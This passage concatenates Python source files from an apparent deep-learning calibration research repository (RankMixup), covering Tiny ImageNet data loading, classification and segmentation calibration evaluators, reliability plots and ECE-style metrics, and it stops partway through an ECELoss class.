self.label_text_to_number = {text: i for i, text in enumerate(self.label_texts)}
if self.split == 'train':
for label_text, i in self.label_text_to_number.items():
for cnt in range(NUM_IMAGES_PER_CLASS):
self.labels['%s_%d.%s' % (label_text, cnt, EXTENSION)] = i
elif self.split == 'val':
with open(os.path.join(self.split_dir, VAL_ANNOTATION_FILE), 'r') as fp:
for line in fp.readlines():
terms = line.split('\t')
file_name, label_text = terms[0], terms[1]
self.labels[file_name] = self.label_text_to_number[label_text]
# read all images into torch tensor in memory to minimize disk IO overhead
if self.in_memory:
self.images = [self.read_image(path) for path in self.image_paths]
def __len__(self):
return len(self.image_paths)
def __getitem__(self, index):
file_path = self.image_paths[index]
if self.in_memory:
img = self.images[index]
else:
img = self.read_image(file_path)
if self.split == 'test':
return img
else:
# file_name = file_path.split('/')[-1]
return img, self.labels[os.path.basename(file_path)]
def __repr__(self):
fmt_str = 'Dataset ' + self.__class__.__name__ + '\n'
fmt_str += ' Number of datapoints: {}\n'.format(self.__len__())
tmp = self.split
fmt_str += ' Split: {}\n'.format(tmp)
fmt_str += ' Root Location: {}\n'.format(self.root)
tmp = ' Transforms (if any): '
fmt_str += '{0}{1}\n'.format(tmp, self.transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
tmp = ' Target Transforms (if any): '
fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
return fmt_str
def read_image(self, path):
img = Image.open(path)
if (img.mode == 'L'):
img = img.convert('RGB')
return self.transform(img) if self.transform else img
def get_data_loader(root,
batch_size,
split='train',
shuffle=True,
num_workers=4,
pin_memory=False):
"""
    Utility function for loading and returning a multi-process
    iterator over the requested split of the Tiny ImageNet dataset.
If using CUDA, num_workers should be set to 1 and pin_memory to True.
Params
------
- root: The root directory for TinyImagenet dataset
- batch_size: how many samples per batch to load.
- split: Can be train/val/test. For train we apply the data augmentation techniques.
- shuffle: whether to shuffle the train/validation indices.
- num_workers: number of subprocesses to use when loading the dataset.
- pin_memory: whether to copy tensors into CUDA pinned memory. Set it to
True if using GPU.
Returns
-------
    - data_loader: iterator over the requested split.
"""
normalize = transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
)
val_test_transform = transforms.Compose([
transforms.ToTensor(),
normalize
])
train_transform = transforms.Compose([
transforms.RandomCrop(64, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize
])
# load the dataset
data_dir = root
if (split == 'train'):
dataset = TinyImageNet(data_dir,
split='train',
transform=train_transform,
in_memory=True)
else:
dataset = TinyImageNet(data_dir,
split='val',
transform=val_test_transform,
in_memory=True)
data_loader = torch.utils.data.DataLoader(
dataset, batch_size=batch_size,
        num_workers=num_workers, pin_memory=pin_memory, shuffle=shuffle  # honour the shuffle argument
)
return data_loader
def get_train_val_loader(root,
batch_size,
val_samples_per_class=50,
random_seed=1,
shuffle=True,
num_workers=4,
pin_memory=False):
np.random.seed(random_seed)
normalize = transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
)
val_transform = transforms.Compose([
transforms.ToTensor(),
normalize
])
train_transform = transforms.Compose([
transforms.RandomCrop(64, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize
])
train_dataset = TinyImageNet(root,
split="train",
transform=train_transform,
in_memory=False)
val_dataset = TinyImageNet(root,
split="train",
transform=val_transform,
in_memory=False)
num_train = len(train_dataset)
class_indices = {}
for i in range(num_train):
file_path = train_dataset.image_paths[i]
label = train_dataset.labels[os.path.basename(file_path)]
if label not in class_indices:
class_indices[label] = []
class_indices[label].append(i)
train_indices, val_indices = [], []
for label in class_indices:
indices = class_indices[label]
if shuffle:
np.random.shuffle(indices)
train_indices.extend(indices[:-val_samples_per_class])
val_indices.extend(indices[-val_samples_per_class:])
train_sampler = SubsetRandomSampler(train_indices)
val_sampler = SubsetRandomSampler(val_indices)
train_loader = DataLoader(
train_dataset, batch_size=batch_size, sampler=train_sampler,
num_workers=num_workers, pin_memory=pin_memory
)
val_loader = DataLoader(
val_dataset, batch_size=batch_size, sampler=val_sampler,
num_workers=num_workers, pin_memory=pin_memory
)
return train_loader, val_loader
def get_test_loader(root,
batch_size,
num_workers=4,
pin_memory=False):
normalize = transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]
)
test_transform = transforms.Compose([
transforms.ToTensor(),
normalize
])
dataset = TinyImageNet(root, split="val",
transform=test_transform,
in_memory=False)
data_loader = DataLoader(
dataset, batch_size=batch_size,
num_workers=num_workers, pin_memory=pin_memory
)
return data_loader
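# Hedged usage sketch (added for illustration, not in the original file): the
# root below is a placeholder; it must point at an extracted tiny-imagenet-200
# directory containing train/, val/ and wnids.txt as expected by TinyImageNet.
if __name__ == "__main__":
    train_loader, val_loader = get_train_val_loader(
        root="./data/tiny-imagenet-200", batch_size=64,
        val_samples_per_class=50, num_workers=2
    )
    test_loader = get_test_loader(root="./data/tiny-imagenet-200", batch_size=64)
    imgs, labels = next(iter(train_loader))
    print(imgs.shape)  # e.g. torch.Size([64, 3, 64, 64])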
| 9,123 | Python | .py | 226 | 30.535398 | 117 | 0.591099 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,881 | segment_calibrate_evaluator.py | cvlab-yonsei_RankMixup/calibrate/evaluation/segment_calibrate_evaluator.py | import logging
from terminaltables import AsciiTable
import numpy as np
import torch
from torch import nn
import torch.nn.functional as F
import wandb
from .evaluator import DatasetEvaluator
from .metrics import ECELoss, AdaptiveECELoss, ClasswiseECELoss
from .reliability_diagram import ReliabilityDiagram
from calibrate.utils.torch_helper import to_numpy
logger = logging.getLogger(__name__)
class SegmentCalibrateEvaluator(DatasetEvaluator):
def __init__(self, num_classes, num_bins=15, ignore_index: int = -1, device="cuda:0") -> None:
self.num_classes = num_classes
self.num_bins = num_bins
self.ignore_index = ignore_index
self.device = device
self.reset()
self.nll_criterion = nn.CrossEntropyLoss().to(self.device)
self.ece_criterion = ECELoss(self.num_bins).to(self.device)
self.aece_criterion = AdaptiveECELoss(self.num_bins).to(self.device)
self.cece_criterion = ClasswiseECELoss(self.num_bins).to(self.device)
def reset(self) -> None:
self.count = []
self.nll = []
self.ece = []
self.aece = []
self.cece = []
def num_samples(self):
return sum(self.count)
def main_metric(self) -> None:
return "ece"
def update(self, logits: torch.Tensor, labels: torch.Tensor) -> None:
"""update
Args:
logits (torch.Tensor): n x num_classes
label (torch.Tensor): n x 1
"""
assert logits.shape[0] == labels.shape[0]
n, c, x, y = logits.shape
logits = torch.einsum("ncxy->nxyc", logits)
logits = logits.reshape(n * x * y, -1)
labels = labels.reshape(n * x * y)
if 0 <= self.ignore_index:
index = torch.nonzero(labels != self.ignore_index).squeeze()
logits = logits[index, :]
labels = labels[index]
# dismiss background
index = torch.nonzero(labels != 0).squeeze()
logits = logits[index, :].to(self.device)
labels = labels[index].to(self.device)
n = logits.shape[0]
self.count.append(n)
nll = self.nll_criterion(logits, labels).item()
ece = self.ece_criterion(logits, labels).item()
aece = self.aece_criterion(logits, labels).item()
cece = self.cece_criterion(logits, labels).item()
self.nll.append(nll)
self.ece.append(ece)
self.aece.append(aece)
self.cece.append(cece)
def mean_score(self, print=False, all_metric=True):
total_count = sum(self.count)
nll, ece, aece, cece = 0, 0, 0, 0
for i in range(len(self.nll)):
nll += self.nll[i] * (self.count[i] / total_count)
ece += self.ece[i] * (self.count[i] / total_count)
aece += self.aece[i] * (self.count[i] / total_count)
cece += self.cece[i] * (self.count[i] / total_count)
metric = {"nll": nll, "ece": ece, "aece": aece, "cece": cece}
columns = ["samples", "nll", "ece", "aece", "cece"]
table_data = [columns]
table_data.append(
[
total_count,
"{:.5f}".format(nll),
"{:.5f}".format(ece),
"{:.5f}".format(aece),
"{:.5f}".format(cece),
]
)
if print:
table = AsciiTable(table_data)
logger.info("\n" + table.table)
if all_metric:
return metric, table_data
else:
return metric[self.main_metric()]
def wandb_score_table(self):
_, table_data = self.mean_score(print=False)
return wandb.Table(
columns=table_data[0],
data=table_data[1:]
)
    # Note: the two helpers below expect self.logits and self.labels, which this
    # evaluator never populates (update() only keeps per-batch scalar metrics),
    # so they only work if a caller assigns those attributes beforehand.
    def plot_reliability_diagram(self):
diagram = ReliabilityDiagram(bins=25, style="curve")
probs = F.softmax(self.logits, dim=1)
fig_reliab, fig_hist = diagram.plot(to_numpy(probs), to_numpy(self.labels))
return fig_reliab, fig_hist
def save_npz(self, save_path):
np.savez(
save_path,
logits=to_numpy(self.logits),
labels=to_numpy(self.labels)
)
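# Hedged sketch (added for illustration, not part of the original module):
# random segmentation logits/labels on the CPU, only to show the expected
# (n, c, h, w) / (n, h, w) call shapes; the sizes, seed and device are
# assumptions for the example.
def _demo_segment_calibrate_evaluator():
    torch.manual_seed(0)
    evaluator = SegmentCalibrateEvaluator(num_classes=5, num_bins=15,
                                          ignore_index=255, device="cpu")
    logits = torch.randn(2, 5, 32, 32)
    labels = torch.randint(0, 5, (2, 32, 32))
    evaluator.update(logits, labels)
    return evaluator.mean_score(all_metric=False)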
| 4,170 | Python | .py | 106 | 30.320755 | 99 | 0.588075 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,882 | classification_evaluator.py | cvlab-yonsei_RankMixup/calibrate/evaluation/classification_evaluator.py | import logging
from terminaltables import AsciiTable
import numpy as np
from sklearn.metrics import top_k_accuracy_score, confusion_matrix
import wandb
from .evaluator import DatasetEvaluator
logger = logging.getLogger(__name__)
class ClassificationEvaluator(DatasetEvaluator):
def __init__(
self,
num_classes: int
) -> None:
self.num_classes = num_classes
def reset(self) -> None:
self.preds = None
self.labels = None
def main_metric(self) -> None:
return "acc"
def num_samples(self):
return (
self.labels.shape[0]
if self.labels is not None
else 0
)
def update(self, pred: np.ndarray, label: np.ndarray) -> float:
"""update
Args:
pred (np.ndarray): n x num_classes
label (np.ndarray): n x 1
Returns:
float: acc
"""
assert pred.shape[0] == label.shape[0]
if self.preds is None:
self.preds = pred
self.labels = label
else:
self.preds = np.concatenate((self.preds, pred), axis=0)
self.labels = np.concatenate((self.labels, label), axis=0)
pred_label = np.argmax(pred, axis=1)
acc = (pred_label == label).astype("int").sum() / label.shape[0]
# acc = top_k_accuracy_score(label, pred, k=1)
self.curr = {"acc": acc}
return acc
def curr_score(self):
return self.curr
def mean_score(self, print=False, all_metric=True):
# acc = (
# (self.preds == self.labels).astype("int").sum()
# / self.labels.shape[0]
# )
acc = top_k_accuracy_score(self.labels, self.preds, k=1)
acc_5 = top_k_accuracy_score(self.labels, self.preds, k=5)
pred_labels = np.argmax(self.preds, axis=1)
confusion = confusion_matrix(self.labels, pred_labels, normalize="true")
macc = np.diagonal(confusion).mean()
metric = {"acc": acc, "acc_5": acc_5, "macc": macc}
columns = ["samples", "acc", "acc_5", "macc"]
table_data = [columns]
table_data.append(
[
self.num_samples(),
"{:.5f}".format(acc),
"{:.5f}".format(acc_5),
"{:.5f}".format(macc)
]
)
if print:
table = AsciiTable(table_data)
logger.info("\n" + table.table)
if all_metric:
return metric, table_data
else:
return metric[self.main_metric()], table_data
def wandb_score_table(self):
_, table_data = self.mean_score(print=False)
return wandb.Table(
columns=table_data[0],
data=table_data[1:]
)
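# Hedged sketch (added for illustration, not part of the original module): the
# evaluator above consumes score arrays of shape (n, num_classes) and integer
# labels; the synthetic inputs below are invented for the example. reset() is
# called explicitly because __init__ does not initialise the buffers itself.
def _demo_classification_evaluator(num_classes=10, n=250, seed=0):
    rng = np.random.default_rng(seed)
    scores = rng.random((n, num_classes))
    scores = scores / scores.sum(axis=1, keepdims=True)
    labels = np.tile(np.arange(num_classes), n // num_classes)  # every class present
    evaluator = ClassificationEvaluator(num_classes)
    evaluator.reset()
    evaluator.update(scores, labels)
    metric, _ = evaluator.mean_score(print=False)
    return metric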
class LT_ClassificationEvaluator(DatasetEvaluator):
def __init__(
self,
num_classes: int
) -> None:
self.num_classes = num_classes
def reset(self) -> None:
self.preds = None
self.labels = None
self.correct = None
self.class_num = None
self.head_class_idx = None
self.med_class_idx = None
self.tail_class_idx = None
def main_metric(self) -> None:
return "acc"
def num_samples(self):
return (
self.labels.shape[0]
if self.labels is not None
else 0
)
def update(self, pred: np.ndarray, label: np.ndarray, correct, class_num,
head_class_idx, med_class_idx, tail_class_idx) -> float:
"""update
Args:
pred (np.ndarray): n x num_classes
label (np.ndarray): n x 1
Returns:
float: acc
"""
assert pred.shape[0] == label.shape[0]
if self.preds is None:
self.preds = pred
self.labels = label
self.correct = correct
self.class_num = class_num
self.head_class_idx = head_class_idx
self.med_class_idx = med_class_idx
self.tail_class_idx = tail_class_idx
else:
self.preds = np.concatenate((self.preds, pred), axis=0)
self.labels = np.concatenate((self.labels, label), axis=0)
self.correct = correct
self.class_num = class_num
pred_label = np.argmax(pred, axis=1)
acc = (pred_label == label).astype("int").sum() / label.shape[0]
# acc = top_k_accuracy_score(label, pred, k=1)
self.curr = {"acc": acc}
return acc
def curr_score(self):
return self.curr
def mean_score(self, print=False, all_metric=True):
# acc = (
# (self.preds == self.labels).astype("int").sum()
# / self.labels.shape[0]
# )
acc = top_k_accuracy_score(self.labels, self.preds, k=1)
acc_5 = top_k_accuracy_score(self.labels, self.preds, k=5)
pred_labels = np.argmax(self.preds, axis=1)
confusion = confusion_matrix(self.labels, pred_labels, normalize="true")
macc = np.diagonal(confusion).mean()
acc_classes = self.correct / self.class_num
acc_classes = np.float64(acc_classes)
head_acc = acc_classes[self.head_class_idx[0]:self.head_class_idx[1]].mean()
med_acc = acc_classes[self.med_class_idx[0]:self.med_class_idx[1]].mean()
tail_acc = acc_classes[self.tail_class_idx[0]:self.tail_class_idx[1]].mean()
metric = {"acc": acc, "acc_5": acc_5, "macc": macc, "head_acc": head_acc, "med_acc": med_acc, "tail_acc": tail_acc}
columns = ["samples", "acc", "acc_5", "macc", "head_acc", "med_acc", "tail_acc"]
table_data = [columns]
table_data.append(
[
self.num_samples(),
"{:.5f}".format(acc),
"{:.5f}".format(acc_5),
"{:.5f}".format(macc),
"{:.5f}".format(head_acc),
"{:.5f}".format(med_acc),
"{:.5f}".format(tail_acc)
]
)
if print:
table = AsciiTable(table_data)
logger.info("\n" + table.table)
if all_metric:
return metric, table_data
else:
return metric[self.main_metric()], table_data
def wandb_score_table(self):
_, table_data = self.mean_score(print=False)
return wandb.Table(
columns=table_data[0],
data=table_data[1:]
) | 6,461 | Python | .py | 174 | 27.166667 | 123 | 0.54723 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,883 | plots.py | cvlab-yonsei_RankMixup/calibrate/evaluation/plots.py | '''
This file contains method for generating calibration related plots, eg. reliability plots.
References:
[1] C. Guo, G. Pleiss, Y. Sun, and K. Q. Weinberger. On calibration of modern neural networks.
arXiv preprint arXiv:1706.04599, 2017.
'''
import math
import matplotlib.pyplot as plt
from sklearn.metrics import roc_curve, auc
plt.rcParams.update({'font.size': 20})
# Some keys used for the following dictionaries
COUNT = 'count'
CONF = 'conf'
ACC = 'acc'
BIN_ACC = 'bin_acc'
BIN_CONF = 'bin_conf'
def _bin_initializer(bin_dict, num_bins=10):
for i in range(num_bins):
bin_dict[i][COUNT] = 0
bin_dict[i][CONF] = 0
bin_dict[i][ACC] = 0
bin_dict[i][BIN_ACC] = 0
bin_dict[i][BIN_CONF] = 0
def _populate_bins(confs, preds, labels, num_bins=10):
bin_dict = {}
for i in range(num_bins):
bin_dict[i] = {}
_bin_initializer(bin_dict, num_bins)
num_test_samples = len(confs)
for i in range(0, num_test_samples):
confidence = confs[i]
prediction = preds[i]
label = labels[i]
binn = int(math.ceil(((num_bins * confidence) - 1)))
bin_dict[binn][COUNT] = bin_dict[binn][COUNT] + 1
bin_dict[binn][CONF] = bin_dict[binn][CONF] + confidence
bin_dict[binn][ACC] = bin_dict[binn][ACC] + \
(1 if (label == prediction) else 0)
for binn in range(0, num_bins):
if (bin_dict[binn][COUNT] == 0):
bin_dict[binn][BIN_ACC] = 0
bin_dict[binn][BIN_CONF] = 0
else:
bin_dict[binn][BIN_ACC] = float(
bin_dict[binn][ACC]) / bin_dict[binn][COUNT]
bin_dict[binn][BIN_CONF] = bin_dict[binn][CONF] / \
float(bin_dict[binn][COUNT])
return bin_dict
def reliability_plot(confs, preds, labels, num_bins=15):
'''
Method to draw a reliability plot from a model's predictions and confidences.
'''
bin_dict = _populate_bins(confs, preds, labels, num_bins)
bns = [(i / float(num_bins)) for i in range(num_bins)]
y = []
for i in range(num_bins):
y.append(bin_dict[i][BIN_ACC])
plt.figure(figsize=(10, 8)) # width:20, height:3
plt.bar(bns, bns, align='edge', width=0.05, color='pink', label='Expected')
plt.bar(bns, y, align='edge', width=0.05,
color='blue', alpha=0.5, label='Actual')
plt.ylabel('Accuracy')
plt.xlabel('Confidence')
plt.legend()
plt.show()
def bin_strength_plot(confs, preds, labels, num_bins=15):
'''
Method to draw a plot for the number of samples in each confidence bin.
'''
bin_dict = _populate_bins(confs, preds, labels, num_bins)
bns = [(i / float(num_bins)) for i in range(num_bins)]
num_samples = len(labels)
y = []
for i in range(num_bins):
n = (bin_dict[i][COUNT] / float(num_samples)) * 100
y.append(n)
plt.figure(figsize=(10, 8)) # width:20, height:3
plt.bar(bns, y, align='edge', width=0.05,
color='blue', alpha=0.5, label='Percentage samples')
plt.ylabel('Percentage of samples')
plt.xlabel('Confidence')
plt.show()
def multi_class_roc(y_true, y_score):
    '''
    Compute per-class ROC curves and AUCs. `y_true` is expected to be
    label-binarized (one-hot) with the same shape as `y_score`.
    '''
    n_classes = y_score.shape[1]
    # Compute ROC curve and ROC area for each class
    fpr = dict()
    tpr = dict()
    roc_auc = dict()
    for i in range(n_classes):
        fpr[i], tpr[i], _ = roc_curve(y_true[:, i], y_score[:, i])
        roc_auc[i] = auc(fpr[i], tpr[i])
    return fpr, tpr, roc_auc
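# Hedged sketch (added for illustration, not part of the original module):
# synthetic confidences, predictions and labels for the plotting helpers above;
# the sizes and the deliberately over-confident scores are invented for the
# example.
if __name__ == "__main__":
    import numpy as np
    rng = np.random.default_rng(0)
    n = 1000
    labels = rng.integers(0, 10, size=n)
    preds = np.where(rng.random(n) < 0.6, labels, rng.integers(0, 10, size=n))
    confs = rng.uniform(0.7, 1.0, size=n)  # over-confident model
    reliability_plot(confs, preds, labels, num_bins=15)
    bin_strength_plot(confs, preds, labels, num_bins=15)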
| 3,397 | Python | .py | 90 | 31.644444 | 94 | 0.60723 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,884 | logits_evaluator.py | cvlab-yonsei_RankMixup/calibrate/evaluation/logits_evaluator.py | import numpy as np
from .evaluator import DatasetEvaluator
class LogitsEvaluator(DatasetEvaluator):
"""get logit differences
mean_diff : (max value of logits - value of logits).mean()
max_diff : (max value of logits - value of logits).max()
margin : max value of logits - second max value of logits
Args:
DatasetEvaluator ([type]): [description]
"""
def __init__(self) -> None:
self.reset()
def reset(self) -> None:
self.count = 0
self.mean_diffs = []
self.max_diffs = []
self.margins = []
def num_samples(self):
return self.count
def main_metric(self):
return "mean_diffs"
def update(self, logits: np.ndarray):
n = logits.shape[0]
self.count += n
sort_inds = np.argsort(logits, axis=1)
max_values = np.zeros(n)
second_max_values = np.zeros(n)
min_values = np.zeros(n)
for i in range(n):
max_values[i] = logits[i, sort_inds[i, -1]]
second_max_values[i] = logits[i, sort_inds[i, -2]]
min_values[i] = logits[i, sort_inds[i, 0]]
# max_values = logits[:, sort_inds[:, -1]]
# second_max_values = logits[:, sort_inds[:, -2]]
diffs = np.repeat(max_values.reshape(n, 1), logits.shape[1], axis=1) - logits
# self.mean_diffs.append(diffs.sum())
self.mean_diffs.append(np.sum(diffs, axis=1) / (logits.shape[1] - 1))
self.max_diffs.append(np.max(diffs, axis=1))
margins = max_values - second_max_values
self.margins.append(margins)
return np.mean(self.mean_diffs[-1])
def curr_score(self):
return {
self.main_metric(): np.mean(self.mean_diffs[-1])
}
def mean_score(self, all_metric=True):
mean_diffs = np.concatenate(self.mean_diffs)
max_diffs = np.concatenate(self.max_diffs)
margins = np.concatenate(self.margins)
if not all_metric:
            return np.mean(mean_diffs)  # use the concatenated per-sample values
metric = {}
metric["mean_diffs"] = np.mean(mean_diffs)
metric["max_diffs"] = np.mean(max_diffs)
metric["margin"] = np.mean(margins)
return metric
| 2,210 | Python | .py | 56 | 31.160714 | 85 | 0.593545 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,885 | calibrate_evaluator.py | cvlab-yonsei_RankMixup/calibrate/evaluation/calibrate_evaluator.py | import logging
from terminaltables import AsciiTable
import numpy as np
import torch
from torch import nn
import torch.nn.functional as F
import wandb
from .evaluator import DatasetEvaluator
from .metrics import ECELoss, AdaptiveECELoss, ClasswiseECELoss, OELoss, UELoss
from .reliability_diagram import ReliabilityDiagram
from calibrate.utils.torch_helper import to_numpy
logger = logging.getLogger(__name__)
class CalibrateEvaluator(DatasetEvaluator):
def __init__(self, num_classes, num_bins=15, device="cuda:0") -> None:
self.num_classes = num_classes
self.num_bins = num_bins
self.device = device
self.reset()
def reset(self) -> None:
self.logits = None
self.labels = None
def num_samples(self):
return (
self.labels.shape[0]
if self.labels is not None
else 0
)
def main_metric(self) -> None:
return "ece"
def update(self, logits: torch.Tensor, labels: torch.Tensor) -> None:
"""update
Args:
logits (torch.Tensor): n x num_classes
label (torch.Tensor): n x 1
"""
assert logits.shape[0] == labels.shape[0]
if self.logits is None:
self.logits = logits
self.labels = labels
else:
self.logits = torch.cat((self.logits, logits), dim=0)
self.labels = torch.cat((self.labels, labels), dim=0)
def mean_score(self, print=False, all_metric=True):
nll_criterion = nn.CrossEntropyLoss().to(self.device)
ece_criterion = ECELoss(self.num_bins).to(self.device)
aece_criterion = AdaptiveECELoss(self.num_bins).to(self.device)
cece_criterion = ClasswiseECELoss(self.num_bins).to(self.device)
oe_criterion = OELoss(self.num_bins).to(self.device)
ue_criterion = UELoss(self.num_bins).to(self.device)
nll = nll_criterion(self.logits, self.labels).item()
ece = ece_criterion(self.logits, self.labels).item()
aece = aece_criterion(self.logits, self.labels).item()
cece = cece_criterion(self.logits, self.labels).item()
oe = oe_criterion(self.logits, self.labels).item()
ue = ue_criterion(self.logits, self.labels).item()
# metric = {"nll": nll, "ece": ece, "aece": aece, "cece": cece}
metric = {"nll": nll, "ece": ece, "aece": aece, "cece": cece, "oe": oe, "ue": ue}
# columns = ["samples", "nll", "ece", "aece", "cece"]
columns = ["samples", "nll", "ece", "aece", "cece", "oe", "ue"]
table_data = [columns]
# table_data.append(
# [
# self.num_samples(),
# "{:.5f}".format(nll),
# "{:.5f}".format(ece),
# "{:.5f}".format(aece),
# "{:.5f}".format(cece),
# ]
# )
table_data.append(
[
self.num_samples(),
"{:.5f}".format(nll),
"{:.5f}".format(ece),
"{:.5f}".format(aece),
"{:.5f}".format(cece),
"{:.5f}".format(oe),
"{:.5f}".format(ue),
]
)
if print:
table = AsciiTable(table_data)
logger.info("\n" + table.table)
if all_metric:
return metric, table_data
else:
return metric[self.main_metric()]
def wandb_score_table(self):
_, table_data = self.mean_score(print=False)
return wandb.Table(
columns=table_data[0],
data=table_data[1:]
)
def plot_reliability_diagram(self, title=""):
diagram = ReliabilityDiagram(bins=25, style="curve")
probs = F.softmax(self.logits, dim=1)
fig_reliab, fig_hist = diagram.plot(
to_numpy(probs), to_numpy(self.labels),
title_suffix=title
)
return fig_reliab, fig_hist
def save_npz(self, save_path):
np.savez(
save_path,
logits=to_numpy(self.logits),
labels=to_numpy(self.labels)
)
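# Hedged sketch (added for illustration, not part of the original module):
# random logits and labels on the CPU showing the update -> mean_score call
# sequence; the shapes, seed and device are assumptions for the example.
def _demo_calibrate_evaluator():
    torch.manual_seed(0)
    evaluator = CalibrateEvaluator(num_classes=10, num_bins=15, device="cpu")
    logits = torch.randn(512, 10)
    labels = torch.randint(0, 10, (512,))
    evaluator.update(logits, labels)
    metric, _ = evaluator.mean_score(print=False)
    return metric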
| 4,116 | Python | .py | 107 | 29.261682 | 89 | 0.565773 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,886 | metrics.py | cvlab-yonsei_RankMixup/calibrate/evaluation/metrics.py | '''
Metrics to measure calibration of a trained deep neural network.
References:
[1] C. Guo, G. Pleiss, Y. Sun, and K. Q. Weinberger. On calibration of modern neural networks.
arXiv preprint arXiv:1706.04599, 2017.
'''
import math
import torch
import numpy as np
from torch import nn
from torch.nn import functional as F
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix
# Some keys used for the following dictionaries
COUNT = 'count'
CONF = 'conf'
ACC = 'acc'
BIN_ACC = 'bin_acc'
BIN_CONF = 'bin_conf'
def _bin_initializer(bin_dict, num_bins=10):
for i in range(num_bins):
bin_dict[i][COUNT] = 0
bin_dict[i][CONF] = 0
bin_dict[i][ACC] = 0
bin_dict[i][BIN_ACC] = 0
bin_dict[i][BIN_CONF] = 0
def _populate_bins(confs, preds, labels, num_bins=10):
bin_dict = {}
for i in range(num_bins):
bin_dict[i] = {}
_bin_initializer(bin_dict, num_bins)
num_test_samples = len(confs)
for i in range(0, num_test_samples):
confidence = confs[i]
prediction = preds[i]
label = labels[i]
binn = int(math.ceil(((num_bins * confidence) - 1)))
bin_dict[binn][COUNT] = bin_dict[binn][COUNT] + 1
bin_dict[binn][CONF] = bin_dict[binn][CONF] + confidence
bin_dict[binn][ACC] = bin_dict[binn][ACC] + \
(1 if (label == prediction) else 0)
for binn in range(0, num_bins):
if (bin_dict[binn][COUNT] == 0):
bin_dict[binn][BIN_ACC] = 0
bin_dict[binn][BIN_CONF] = 0
else:
bin_dict[binn][BIN_ACC] = float(
bin_dict[binn][ACC]) / bin_dict[binn][COUNT]
bin_dict[binn][BIN_CONF] = bin_dict[binn][CONF] / \
float(bin_dict[binn][COUNT])
return bin_dict
def expected_calibration_error(confs, preds, labels, num_bins=10):
bin_dict = _populate_bins(confs, preds, labels, num_bins)
num_samples = len(labels)
ece = 0
for i in range(num_bins):
bin_accuracy = bin_dict[i][BIN_ACC]
bin_confidence = bin_dict[i][BIN_CONF]
bin_count = bin_dict[i][COUNT]
ece += (float(bin_count) / num_samples) * \
abs(bin_accuracy - bin_confidence)
return ece
def maximum_calibration_error(confs, preds, labels, num_bins=10):
bin_dict = _populate_bins(confs, preds, labels, num_bins)
ce = []
for i in range(num_bins):
bin_accuracy = bin_dict[i][BIN_ACC]
bin_confidence = bin_dict[i][BIN_CONF]
ce.append(abs(bin_accuracy - bin_confidence))
return max(ce)
def average_calibration_error(confs, preds, labels, num_bins=10):
bin_dict = _populate_bins(confs, preds, labels, num_bins)
non_empty_bins = 0
ace = 0
for i in range(num_bins):
bin_accuracy = bin_dict[i][BIN_ACC]
bin_confidence = bin_dict[i][BIN_CONF]
bin_count = bin_dict[i][COUNT]
if bin_count > 0:
non_empty_bins += 1
ace += abs(bin_accuracy - bin_confidence)
return ace / float(non_empty_bins)
def l2_error(confs, preds, labels, num_bins=15):
bin_dict = _populate_bins(confs, preds, labels, num_bins)
num_samples = len(labels)
l2_sum = 0
for i in range(num_bins):
bin_accuracy = bin_dict[i][BIN_ACC]
bin_confidence = bin_dict[i][BIN_CONF]
bin_count = bin_dict[i][COUNT]
l2_sum += (float(bin_count) / num_samples) * \
(bin_accuracy - bin_confidence)**2
l2_error = math.sqrt(l2_sum)
return l2_error
def test_classification_net_logits(logits, labels):
'''
This function reports classification accuracy and confusion matrix given logits and labels
from a model.
'''
labels_list = []
predictions_list = []
confidence_vals_list = []
softmax = F.softmax(logits, dim=1)
confidence_vals, predictions = torch.max(softmax, dim=1)
labels_list.extend(labels.cpu().numpy().tolist())
predictions_list.extend(predictions.cpu().numpy().tolist())
confidence_vals_list.extend(confidence_vals.cpu().numpy().tolist())
accuracy = accuracy_score(labels_list, predictions_list)
return confusion_matrix(labels_list, predictions_list), accuracy, labels_list,\
predictions_list, confidence_vals_list
def test_classification_net(model, data_loader, device):
'''
This function reports classification accuracy and confusion matrix over a dataset.
'''
model.eval()
labels_list = []
predictions_list = []
confidence_vals_list = []
with torch.no_grad():
for i, (data, label) in enumerate(data_loader):
data = data.to(device)
label = label.to(device)
logits = model(data)
softmax = F.softmax(logits, dim=1)
confidence_vals, predictions = torch.max(softmax, dim=1)
labels_list.extend(label.cpu().numpy().tolist())
predictions_list.extend(predictions.cpu().numpy().tolist())
confidence_vals_list.extend(confidence_vals.cpu().numpy().tolist())
accuracy = accuracy_score(labels_list, predictions_list)
return confusion_matrix(labels_list, predictions_list), accuracy, labels_list,\
predictions_list, confidence_vals_list
@torch.no_grad()
def model_prediction(model, data_loader, device):
model.eval()
all_predicts, all_labels = None, None
for i, (data, label) in enumerate(data_loader):
data, label = data.to(device), label.to(device)
logits = model(data)
predicts = F.softmax(logits, dim=1)
if all_predicts is None:
all_predicts = predicts.cpu().numpy()
all_labels = label.cpu().numpy()
else:
all_predicts = np.concatenate((all_predicts, predicts.cpu().numpy()), axis=0)
all_labels = np.concatenate((all_labels, label.cpu().numpy()))
return all_predicts, all_labels
# Calibration error scores in the form of loss metrics
class ECELoss(nn.Module):
'''
Compute ECE (Expected Calibration Error)
'''
def __init__(self, n_bins=15):
super(ECELoss, self).__init__()
